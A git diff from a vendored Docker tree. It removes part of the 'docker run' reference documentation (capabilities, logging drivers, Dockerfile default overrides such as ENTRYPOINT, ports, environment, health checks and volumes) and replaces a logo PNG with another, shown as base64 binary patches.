mlockall(2), mmap(2), shmctl(2)). | -| IPC_OWNER | Bypass permission checks for operations on System V IPC objects. | -| SYS_PTRACE | Trace arbitrary processes using ptrace(2). | -| SYS_BOOT | Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution. | -| LEASE | Establish leases on arbitrary files (see fcntl(2)). | -| WAKE_ALARM | Trigger something that will wake up the system. | -| BLOCK_SUSPEND | Employ features that can block system suspend. | - -Further reference information is available on the [capabilities(7) - Linux man page](http://man7.org/linux/man-pages/man7/capabilities.7.html) - -Both flags support the value `ALL`, so if the -operator wants to have all capabilities but `MKNOD` they could use: - - $ docker run --cap-add=ALL --cap-drop=MKNOD ... - -For interacting with the network stack, instead of using `--privileged` they -should use `--cap-add=NET_ADMIN` to modify the network interfaces. - - $ docker run -it --rm ubuntu:14.04 ip link add dummy0 type dummy - RTNETLINK answers: Operation not permitted - $ docker run -it --rm --cap-add=NET_ADMIN ubuntu:14.04 ip link add dummy0 type dummy - -To mount a FUSE based filesystem, you need to combine both `--cap-add` and -`--device`: - - $ docker run --rm -it --cap-add SYS_ADMIN sshfs sshfs sven@10.10.10.20:/home/sven /mnt - fuse: failed to open /dev/fuse: Operation not permitted - $ docker run --rm -it --device /dev/fuse sshfs sshfs sven@10.10.10.20:/home/sven /mnt - fusermount: mount failed: Operation not permitted - $ docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs - # sshfs sven@10.10.10.20:/home/sven /mnt - The authenticity of host '10.10.10.20 (10.10.10.20)' can't be established. - ECDSA key fingerprint is 25:34:85:75:25:b0:17:46:05:19:04:93:b5:dd:5f:c6. - Are you sure you want to continue connecting (yes/no)? yes - sven@10.10.10.20's password: - root@30aa0cfaf1b5:/# ls -la /mnt/src/docker - total 1516 - drwxrwxr-x 1 1000 1000 4096 Dec 4 06:08 . - drwxrwxr-x 1 1000 1000 4096 Dec 4 11:46 .. - -rw-rw-r-- 1 1000 1000 16 Oct 8 00:09 .dockerignore - -rwxrwxr-x 1 1000 1000 464 Oct 8 00:09 .drone.yml - drwxrwxr-x 1 1000 1000 4096 Dec 4 06:11 .git - -rw-rw-r-- 1 1000 1000 461 Dec 4 06:08 .gitignore - .... - -The default seccomp profile will adjust to the selected capabilities, in order to allow -use of facilities allowed by the capabilities, so you should not have to adjust this, -since Docker 1.12. In Docker 1.10 and 1.11 this did not happen and it may be necessary -to use a custom seccomp profile or use `--security-opt seccomp=unconfined` when adding -capabilities. - -## Logging drivers (--log-driver) - -The container can have a different logging driver than the Docker daemon. Use -the `--log-driver=VALUE` with the `docker run` command to configure the -container's logging driver. The following options are supported: - -| Driver | Description | -| ----------- | ----------------------------------------------------------------------------------------------------------------------------- | -| `none` | Disables any logging for the container. `docker logs` won't be available with this driver. | -| `json-file` | Default logging driver for Docker. Writes JSON messages to file. No logging options are supported for this driver. | -| `syslog` | Syslog logging driver for Docker. Writes log messages to syslog. | -| `journald` | Journald logging driver for Docker. Writes log messages to `journald`. | -| `gelf` | Graylog Extended Log Format (GELF) logging driver for Docker. Writes log messages to a GELF endpoint likeGraylog or Logstash. | -| `fluentd` | Fluentd logging driver for Docker. Writes log messages to `fluentd` (forward input). | -| `awslogs` | Amazon CloudWatch Logs logging driver for Docker. Writes log messages to Amazon CloudWatch Logs | -| `splunk` | Splunk logging driver for Docker. Writes log messages to `splunk` using Event Http Collector. | - -The `docker logs` command is available only for the `json-file` and `journald` -logging drivers. For detailed information on working with logging drivers, see -[Configure a logging driver](https://docs.docker.com/engine/admin/logging/overview/). - - -## Overriding Dockerfile image defaults - -When a developer builds an image from a [*Dockerfile*](builder.md) -or when she commits it, the developer can set a number of default parameters -that take effect when the image starts up as a container. - -Four of the Dockerfile commands cannot be overridden at runtime: `FROM`, -`MAINTAINER`, `RUN`, and `ADD`. Everything else has a corresponding override -in `docker run`. We'll go through what the developer might have set in each -Dockerfile instruction and how the operator can override that setting. - - - [CMD (Default Command or Options)](#cmd-default-command-or-options) - - [ENTRYPOINT (Default Command to Execute at Runtime)]( - #entrypoint-default-command-to-execute-at-runtime) - - [EXPOSE (Incoming Ports)](#expose-incoming-ports) - - [ENV (Environment Variables)](#env-environment-variables) - - [HEALTHCHECK](#healthcheck) - - [VOLUME (Shared Filesystems)](#volume-shared-filesystems) - - [USER](#user) - - [WORKDIR](#workdir) - -### CMD (default command or options) - -Recall the optional `COMMAND` in the Docker -commandline: - - $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...] - -This command is optional because the person who created the `IMAGE` may -have already provided a default `COMMAND` using the Dockerfile `CMD` -instruction. As the operator (the person running a container from the -image), you can override that `CMD` instruction just by specifying a new -`COMMAND`. - -If the image also specifies an `ENTRYPOINT` then the `CMD` or `COMMAND` -get appended as arguments to the `ENTRYPOINT`. - -### ENTRYPOINT (default command to execute at runtime) - - --entrypoint="": Overwrite the default entrypoint set by the image - -The `ENTRYPOINT` of an image is similar to a `COMMAND` because it -specifies what executable to run when the container starts, but it is -(purposely) more difficult to override. The `ENTRYPOINT` gives a -container its default nature or behavior, so that when you set an -`ENTRYPOINT` you can run the container *as if it were that binary*, -complete with default options, and you can pass in more options via the -`COMMAND`. But, sometimes an operator may want to run something else -inside the container, so you can override the default `ENTRYPOINT` at -runtime by using a string to specify the new `ENTRYPOINT`. Here is an -example of how to run a shell in a container that has been set up to -automatically run something else (like `/usr/bin/redis-server`): - - $ docker run -it --entrypoint /bin/bash example/redis - -or two examples of how to pass more parameters to that ENTRYPOINT: - - $ docker run -it --entrypoint /bin/bash example/redis -c ls -l - $ docker run -it --entrypoint /usr/bin/redis-cli example/redis --help - -You can reset a containers entrypoint by passing an empty string, for example: - - $ docker run -it --entrypoint="" mysql bash - -> **Note**: Passing `--entrypoint` will clear out any default command set on the -> image (i.e. any `CMD` instruction in the Dockerfile used to build it). - -### EXPOSE (incoming ports) - -The following `run` command options work with container networking: - - --expose=[]: Expose a port or a range of ports inside the container. - These are additional to those exposed by the `EXPOSE` instruction - -P : Publish all exposed ports to the host interfaces - -p=[] : Publish a container᾿s port or a range of ports to the host - format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort - Both hostPort and containerPort can be specified as a - range of ports. When specifying ranges for both, the - number of container ports in the range must match the - number of host ports in the range, for example: - -p 1234-1236:1234-1236/tcp - - When specifying a range for hostPort only, the - containerPort must not be a range. In this case the - container port is published somewhere within the - specified hostPort range. (e.g., `-p 1234-1236:1234/tcp`) - - (use 'docker port' to see the actual mapping) - - --link="" : Add link to another container (:alias or ) - -With the exception of the `EXPOSE` directive, an image developer hasn't -got much control over networking. The `EXPOSE` instruction defines the -initial incoming ports that provide services. These ports are available -to processes inside the container. An operator can use the `--expose` -option to add to the exposed ports. - -To expose a container's internal port, an operator can start the -container with the `-P` or `-p` flag. The exposed port is accessible on -the host and the ports are available to any client that can reach the -host. - -The `-P` option publishes all the ports to the host interfaces. Docker -binds each exposed port to a random port on the host. The range of -ports are within an *ephemeral port range* defined by -`/proc/sys/net/ipv4/ip_local_port_range`. Use the `-p` flag to -explicitly map a single port or range of ports. - -The port number inside the container (where the service listens) does -not need to match the port number exposed on the outside of the -container (where clients connect). For example, inside the container an -HTTP service is listening on port 80 (and so the image developer -specifies `EXPOSE 80` in the Dockerfile). At runtime, the port might be -bound to 42800 on the host. To find the mapping between the host ports -and the exposed ports, use `docker port`. - -If the operator uses `--link` when starting a new client container in the -default bridge network, then the client container can access the exposed -port via a private networking interface. -If `--link` is used when starting a container in a user-defined network as -described in [*Docker network overview*](https://docs.docker.com/engine/userguide/networking/), -it will provide a named alias for the container being linked to. - -### ENV (environment variables) - -When a new container is created, Docker will set the following environment -variables automatically: - -| Variable | Value | -| -------- | ----- | -| `HOME` | Set based on the value of `USER` | -| `HOSTNAME` | The hostname associated with the container | -| `PATH` | Includes popular directories, such as `:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` | -| `TERM` | `xterm` if the container is allocated a pseudo-TTY | - -Additionally, the operator can **set any environment variable** in the -container by using one or more `-e` flags, even overriding those mentioned -above, or already defined by the developer with a Dockerfile `ENV`: - - $ docker run -e "deep=purple" --rm ubuntu /bin/bash -c export - declare -x HOME="/" - declare -x HOSTNAME="85bc26a0e200" - declare -x OLDPWD - declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" - declare -x PWD="/" - declare -x SHLVL="1" - declare -x deep="purple" - -Similarly the operator can set the **hostname** with `-h`. - -### HEALTHCHECK - -``` - --health-cmd Command to run to check health - --health-interval Time between running the check - --health-retries Consecutive failures needed to report unhealthy - --health-timeout Maximum time to allow one check to run - --no-healthcheck Disable any container-specified HEALTHCHECK -``` - -Example: - - {% raw %} - $ docker run --name=test -d \ - --health-cmd='stat /etc/passwd || exit 1' \ - --health-interval=2s \ - busybox sleep 1d - $ sleep 2; docker inspect --format='{{.State.Health.Status}}' test - healthy - $ docker exec test rm /etc/passwd - $ sleep 2; docker inspect --format='{{json .State.Health}}' test - { - "Status": "unhealthy", - "FailingStreak": 3, - "Log": [ - { - "Start": "2016-05-25T17:22:04.635478668Z", - "End": "2016-05-25T17:22:04.7272552Z", - "ExitCode": 0, - "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." - }, - { - "Start": "2016-05-25T17:22:06.732900633Z", - "End": "2016-05-25T17:22:06.822168935Z", - "ExitCode": 0, - "Output": " File: /etc/passwd\n Size: 334 \tBlocks: 8 IO Block: 4096 regular file\nDevice: 32h/50d\tInode: 12 Links: 1\nAccess: (0664/-rw-rw-r--) Uid: ( 0/ root) Gid: ( 0/ root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..." - }, - { - "Start": "2016-05-25T17:22:08.823956535Z", - "End": "2016-05-25T17:22:08.897359124Z", - "ExitCode": 1, - "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" - }, - { - "Start": "2016-05-25T17:22:10.898802931Z", - "End": "2016-05-25T17:22:10.969631866Z", - "ExitCode": 1, - "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" - }, - { - "Start": "2016-05-25T17:22:12.971033523Z", - "End": "2016-05-25T17:22:13.082015516Z", - "ExitCode": 1, - "Output": "stat: can't stat '/etc/passwd': No such file or directory\n" - } - ] - } - {% endraw %} - -The health status is also displayed in the `docker ps` output. - -### TMPFS (mount tmpfs filesystems) - -```bash ---tmpfs=[]: Create a tmpfs mount with: container-dir[:], - where the options are identical to the Linux - 'mount -t tmpfs -o' command. -``` - -The example below mounts an empty tmpfs into the container with the `rw`, -`noexec`, `nosuid`, and `size=65536k` options. - - $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image - -### VOLUME (shared filesystems) - - -v, --volume=[host-src:]container-dest[:]: Bind mount a volume. - The comma-delimited `options` are [rw|ro], [z|Z], - [[r]shared|[r]slave|[r]private], and [nocopy]. - The 'host-src' is an absolute path or a name value. - - If neither 'rw' or 'ro' is specified then the volume is mounted in - read-write mode. - - The `nocopy` modes is used to disable automatic copying requested volume - path in the container to the volume storage location. - For named volumes, `copy` is the default mode. Copy modes are not supported - for bind-mounted volumes. - - --volumes-from="": Mount all volumes from the given container(s) - -> **Note**: -> When using systemd to manage the Docker daemon's start and stop, in the systemd -> unit file there is an option to control mount propagation for the Docker daemon -> itself, called `MountFlags`. The value of this setting may cause Docker to not -> see mount propagation changes made on the mount point. For example, if this value -> is `slave`, you may not be able to use the `shared` or `rshared` propagation on -> a volume. - -The volumes commands are complex enough to have their own documentation -in section [*Manage data in -containers*](https://docs.docker.com/engine/tutorials/dockervolumes/). A developer can define -one or more `VOLUME`'s associated with an image, but only the operator -can give access from one container to another (or from a container to a -volume mounted on the host). - -The `container-dest` must always be an absolute path such as `/src/docs`. -The `host-src` can either be an absolute path or a `name` value. If you -supply an absolute path for the `host-dir`, Docker bind-mounts to the path -you specify. If you supply a `name`, Docker creates a named volume by that `name`. - -A `name` value must start with an alphanumeric character, -followed by `a-z0-9`, `_` (underscore), `.` (period) or `-` (hyphen). -An absolute path starts with a `/` (forward slash). - -For example, you can specify either `/foo` or `foo` for a `host-src` value. -If you supply the `/foo` value, Docker creates a bind-mount. If you supply -the `foo` specification, Docker creates a named volume. - -### USER - -`root` (id = 0) is the default user within a container. The image developer can -create additional users. Those users are accessible by name. When passing a numeric -ID, the user does not have to exist in the container. - -The developer can set a default user to run the first process with the -Dockerfile `USER` instruction. When starting a container, the operator can override -the `USER` instruction by passing the `-u` option. - - -u="", --user="": Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user=[ user | user:group | uid | uid:gid | user:gid | uid:group ] - -> **Note:** if you pass a numeric uid, it must be in the range of 0-2147483647. - -### WORKDIR - -The default working directory for running binaries within a container is the -root directory (`/`), but the developer can set a different default with the -Dockerfile `WORKDIR` command. The operator can override this with: - - -w="": Working directory inside the container diff --git a/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png b/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png deleted file mode 100644 index 717d09d773cc46ff8297d06f66d9aa855453f35a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4972 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 IT4fCOKM4~1IsgCw diff --git a/vendor/github.com/docker/docker/docs/static_files/moby-project-logo.png b/vendor/github.com/docker/docker/docs/static_files/moby-project-logo.png new file mode 100644 index 0000000000000000000000000000000000000000..2914186efdd0d3a6223efed318a9e6f09d79359e GIT binary patch literal 20458 zcmaHzV|ZlY(yo(C%#N)|GMU)6C$>GYZ95ZN6WdP5wrx+$iH*~w4F! z)%8|aJ#|lrO2mlH7DyBnN}?$PCveLIvw4$v z%-AE)xa!-$e`)>4SV5AVMc81}0I9(3ZL?|pnfk@E!OIOw+RU_fX9Xf<1h z%79YQ@CVZ(s}06#ZRBITfB*%`T+~(P`6WVDuURE-mqP+Rzx%n({ks0)?>a5^36>qA zv%(A2V#-n}cV=NWqEP?7#CHIv-!2*^m3qi}5A@@uoJ|JD;gCF|BOOGZxSi)i4Fc=W z4f3@nyY5E2bFG#8`;Uutjy8ug_RTcE-=>rLGH`xUf=HGx%4dhN--l3U@0qZxp#JM0 zbbu>Mn#+>uY~|*zpzo>=Zz`363^r@P{=JZfIpy1(T{1i-UuKHwjNkC76;hGvm4-u> z+ezgS%%JP~=PXwM$POhzyOoY;M{EXZ3n#4H6DRDMTWkj2eb;0BLxJtjyl#4(!lkS> z#XjfNQrGzu=NvdYq5u89JYe0E{q96+Q&o?2!^A*|j zTkL`{wzK)BGmc3@|6|$zdZ;t$&NT#{xW2O4bWzgk&0I~E*G$2%ybJgro9KXP@I&U5 z5@XGqGOeJgcc0ny;_ruK|8eXNH1Jr=nH3{KF4DLJ(=l1T7nCAw27QkMq(5v_-%3uV z=gmsZpUYKhttq%Y|H$iALJ|MhQbsWFSd5up@1v{(*Il( zBm@EK6)bqP&q6?VtSPjCmM z-obN+)IW?U<;}V}^<89CS&`rZBw~q`xjxtSw{xjFJznVx%l~BjcO$3y`>(^BS7xj` zpUSCPa*&q-q0;@q`n`{~zQ|nY#);|h7zl^uBmCFi+Ax1@_+yFK9EF&#Mdq^+i$vIz z>qIlzDlx1XANRkNQn$YFTCDu6{GT{e0kG!*?=;;r9n-3X+-!4NuJC_o93>eUC%(m2 z+)6kIDQYg+&JV0oe$jQe_cMaRC&=n1QPOC8GYtp-7lrh~1l?K87Tk{ivRb^zu(V_N z;70XGU@Z)k)C&-900WdtWNhv2vU@+KHocsKi*9+HKJ41upCgi14i?XrAuIF6BE8G$I#*uwV2&p6r$&l&XWio-5nTW6Ex$O_pPI`@-w-WV8M8 z?(*HsbNZt%6iHgKKs>KhF<;3!^nDufbzjo2*jRuvFY07oX~@}vN+yl5I7)R1&WXVV zYSR!Wi{C5zqs{%-N0)PYcAa_jO1qRX?hx3xn+Mn9&HTZkW7aFyYyuFUWar5U4q`RZ^h6tBR1o>=!X{%3t0I4t}brJ&# zTeWs1butYd9L8CjWh`mZ5wr9wk~VN2>cJ3z*4w?Aa`lHUjRPf_S}*vmTqPg!dT&+D zA<}6A{SgB?^2b#^hsi0*Y=Lt1xn`NdM+e%+ll_f&A4{G0y(iYZL2Ca||JK`e)V?9H zQ&9vqh2QpA66db`L%Airz{iorNsy9LKLBrkEIyjK76oC;`8U*D-|cYXTe(_-4@sCI zxG>^puy&K}7d9iIA2P>MeKZ{HRN89vDSFPJh*$vLF9BC!lr5h?sORu=FrOvN6}78t zGlV1@fE10**X}@?2KN4Nf!|yFb0Z1&?!5IQ?OJlR-1dA1T&3RJa8U%bCs6P4IHQ*A zR)^5Wyp=cU3nLU)soPBwp%=PT5hAWd?&8Wb9Fd3xBQ=k=53H6NqFhT5eNqc0lM~9- zs|AtH77Bym{@`f^8v6?LD(0BBZyNqEtdpCQN8a@%- zbp=V3f`YE6pBO_HV11kh-tl!T!!G3pT%~@g4qZxeIIVx?)XORpwQnnH-OLE-6(04--Py$XCG>S@cs?j)G-Ex!^FNt zQfDp7F4?kbaLd~liKsl8=Lkhm&|Halmha!DXsIC^l1&gs=CE3im&@WiDnB_peWYFg zS%#yKYRUE-;*Ma3h;0kkx%bG(HiEc5(}PX_5FORWjvb z5$L#bxOsgVoye*|j7G{7XVC9d3hbR>o^U&8i$3>wNEHTbw_V^qgXfkFz=X;#g7rCB zLT4GVg8>#?GJs#roij;k%TJ%w-HOXL*`Kyo+`|8|ALW=$&FaPkH0Ay(Jvgf1gz1O8 zdxwc#IqlnCSX9~4;VM;~7mq+kBIf74KVQfOR%`V|5hYM9p@w(^dIYTQ+j=SGM{UR_PNN2 z_RCwY`E05VS)>aF&Jx2&jfm*t%;dHj;xQF+U92<^FPaiV@Tz~8a&jm>XNi;)@SIbj z)*Q?+;JS=qrMKs{S#Me{66r6;l#H!q%UisJjV$S#(1@kn4T`0#S|3msT!yQyVT0Ao z;Nq$Xty-H8l8DW+zR+pt+T>jyJk*zs-rxka21`Kw$!Kfx4IJUT~|QZ8$D zV=4>3@$Xhxc0;Et3*7Z7exoI2S-Z~}>zqwfrP+B{Y))=GI>ddgf;Gau!!M~ti-$gn zh~>?)s||hZ!n$g$?$NAJifAZeu1n#SjHe`7whdn+jWtUi%%k?x&g1`9B5{Cbcm z5bm}sWS0=0aLOT7N0kt@9PZK{0lckg6oy~M%TD!keu|kNwP7Z4iEuC4h>G3AdYfe= zo!;YBFuN*EFE+6~GEVx_m@}L;L$0s;y~uPIwQOC-W^jh=d>e}Fsc>$>n;1OAV@L_T z4SSekxoMH*_)aa4mkY{=vQeq_3^y9OP@1ortfcHGhX04-SVr|j-6i&(gu2F1t+dK z7_>9@q~@IAzARc9+T!y3eK+%3T2J|Cfivf=G)YsfSY?R!-Q-b@FqWjdbvVWLZAU1U z&yTV3btvyN$6$tl-C%OQ3y!0~bzb~VV;dBD#$;Wy*&_KHc;ZwcWDwCdsm-E|`KUO~ z?ewL1GMfQ6mTR89u~8_~|4UeGdA6+&4|sqIOKn-W%~#$A&*Rg3d|GA_f%PC`NxyIA zej;COA=-S$fsnf0=}BZ(Se9G0^r`gMU;oZGk;&q7CXOE$MohlOZsevq$4?EL$uBJL{H8)k4^5bx8(uo75$etR%o*XTg!Q z&4H&2TZ!g|SP&Yhq%jR@!ZKGcbiOXXDB70lEX!g=1wl@_Fh{Pk7~TozE7leiY1&K>gJ=1Tw}70Rxmu4mN2gOqQn<;6RY#i0 z9zfNV-TpvmE-asq&;ZbA8$(mn@rmtrJ&{zv_QW^zs)3U(IQ#W_V!DYi@GGa=xV8Ke zqFfDm)?W$}y+W#X-}PaOq>uOy%GK8a9|;Y8i9&5bw@Vg(y?Plw)45nCBPIRf81{s@ z5?NXNRJt8J#I2EQPx!x@2w3e!u@xmdN49&SGgx$x0bQQuA!3s~mRQMP<=NH*J&NB3?_1d0XP!ZIG;$z$026%k&_N?oRGz zGwS1&(8pA2F~_w=@4Rvb!hV=N3PSJC50pjI01ikG7>JVTtP%#=-|2XP&_$0syO!mi z&RL82?6cKAFub0~;>bkhw!sRjA{{>Y9JWrjG$|#X_zs*qQpKUpaK~EF+LkwV$}A)j zE&#MD!wbBaa))+gwt+*;NEH~N-K9Eg7VhbMLpuHTtw=K*&*F!Zc{8f2iVR#79R4-B zx0b~yRXf6gA4lmOqJP~ts^0f;8&r_W47N6OwmZEv9Z`Zs7KLHk25DyCUaH1|8`h%y zcAF3v+Af(>)bIXEr&dPFaD5~nc!+=Ku)q;RX-KM9tLDTN3dZ?D`krm2maCVOm=MlS zPx8aCyyc=IeHU;_eLDFpgUdVQ_54FliruuDl-X)a;)Ji{_jUiz;u!~Ag$|hmr^^Fx zuPqsQAJJBz35`g3-+@*ov0q_5{~(q0(A`8RIX^`>c4}8`=dOf&_8gh3eoXBv#I{v| zZhQ51huFAAT+Etl0tuvS%IZ~`47kf~OTLiN=SWDeF#*%eyIiKS? z-6dqxzJ|=Qer?Fi;9W7&j4~%PBF7j@4Qm71i7<8vsgZjvWM@dnUjQ527e}6gR}RHz zHBze4Q`#(UhQl~Yb+@OBiP9MQU)LRUd=~F9ON`l!Uon~*2sYoYGk?bCl-td zu>EJxLNjPh)TU9XW_Pt9Wk;H;vC0AVWQ7XTP5)5t>he7-?g`Hk=~piypH8Urn_qD_ zH_-aQdGQpEZ1@jShkEt8V2unr<9>*CiVUv#^w6S8VyC}N2+NBguFiw2orWatT=DK= z)z_SF_m=ZR2M8D;EO>7NY6;c&@uhs#4GgxlRlAl)Wzd-LIMVbtc1yqhu61sEpbg8+|SuOZxBrto9%{ z9km_Q6WnwRoz5UdNB4dY%taz#5r*#xjzz12l!e@Cr8)c%S{Y&r1lHl;S%#O?;qZS) 